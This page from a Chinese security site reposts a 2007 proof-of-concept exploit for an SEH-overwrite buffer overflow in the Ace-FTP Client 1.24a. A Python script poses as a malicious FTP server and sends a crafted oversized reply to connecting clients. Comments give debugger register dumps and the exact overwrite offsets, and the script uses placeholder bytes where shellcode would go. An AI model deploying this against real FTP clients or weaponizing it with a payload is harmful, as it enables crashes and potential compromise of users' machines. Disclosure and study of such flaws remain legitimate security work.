首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ace-FTP Client 1.24a Remote Buffer Overflow PoC
来源:www.vfocus.net 作者:n00b 发布时间:2007-06-12  
#!/usr/bin/python
#######################################################################
#Credit to n00b for finding the bug.
#Ace-Ftp client buffer over flow p0c.
#This is possible to exploit as we
#Smash the seh handlers and there are
#Plenty of registers that had our buffer
#Im still new to seh over writes I haven't
#Had much experience with the seh over write
#But get the Idea from what I've read about
#It..Any way this script creates a listening
#Socket and act's as a ftp server then when the
#Client connect's a huge buffer is sent back to
#The client.Resulting and a buffer overflow.
#If any one feel's like investigating or writing
#A poc for this please do so give some credits to
#n00b.I will give it a try during the week.
#######################################################################
#Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre
#######################################################################
#Tested:Win xp sp2.
#Version Affected: v1.24a.
###################################################
#               \\Debug info//
###################################################
#Program received signal SIGSEGV,Segmentation fault.
#[Switching to thread 1312.0x714]
#0x00403c58 in ?? ()
#
#(gdb) i r
#
#eax            0x41414141       1094795585  <----Eax over written..
#ecx            0x0      0
#edx            0xa5b464 10859620
#ebx            0x41414141       1094795585  <----Ebx over written..
#esp            0x12e458 0x12e458
#ebp            0x12f48c 0x12f48c
#esi            0x12e488 1238152
#edi            0xa5b464 10859620
#eip            0x403c58 0x403c58
#eflags         0x10206  66054
#cs             0x1b     27
#ss             0x23     35
#ds             0x23     35
#es             0x23     35
#fs             0x3b     59
#gs             0x0      0
#fctrl          0xffff1272       -60814
#fstat          0xffff0000       -65536
#ftag           0xffffffff       -1
#fiseg          0x0      0
#fioff          0x0      0
#foseg          0xffff0000       -65536
#fooff          0x0      0
###################################################
#What the register look like after crash..
###################################################
#EAX 41414141
#ECX 00000000
#EDX 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
#EBX 41414141
#ESP 0012E458
#EBP 0012F48C ASCII "AAAAAAAAAAAADDDDEEEECCCCCCC
#ESI 0012E488 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 00A5D930 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA
#EIP 00403C58
###################################################
#DS:[41414141]=???
#EDX=00A5D930, (ASCII "AAAAAAAAAAAAAAAAAAAAAAAAA)
#MOV EDX,DWORD PTR DS:[EAX]
###################################################
#SEH chain of main thread
#Address    SE handler
#---------------------------
#0012E46C   AceXFTP.00430B9E
#45454545
#---------------------------
#0012F498   44444444  Pointer to next SEH record
#0012F49C   45454545  SE handler
#
#4112byte's to over write Pointer to next SEH record
#next 4 bytes over writes se handler.
###################################################


from socket import *
from struct import pack

host = "127.0.0.1 "
port = 21

Size_of_buf1  = 4112
Size_of_buf2 =  550


s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\nPort %d open Waiting !!!! ..." % port

cl, addr = s.accept()
print "Vic is connected %s" % addr[0]

buf1 =  "A" * Size_of_buf1

NEXT_SEH_RECORD  = "\x44\x44\x44\x44"

SE_HANDLER       = "\x45\x45\x45\x45"

buf2  = "C" * Size_of_buf2

End  = "\r\n"

cl.send(buf1 + NEXT_SEH_RECORD + SE_HANDLER + buf2 + End)
print "mission accomplished : OK\n"

sleep(3)
cl.close()
s.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Download Accelerator
·TEC-IT TBarCode OCX ActiveX Re
·PHP Real Estate Classifieds Re
·Safari 3 for Windows Beta Remo
·e-Vision CMS <= 2.02 SQL Injec
·Fuzzylime Forum 1.0 (low.php t
·Yahoo! Messenger Webcam 8.1 (Y
·Microsoft Speech API ActiveX c
·Yahoo! Messenger Webcam 8.1 (Y
·Microsoft Speech API ActiveX c
·MoviePlay 4.76 .lst File Local
·Microsoft Office MSODataSource
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved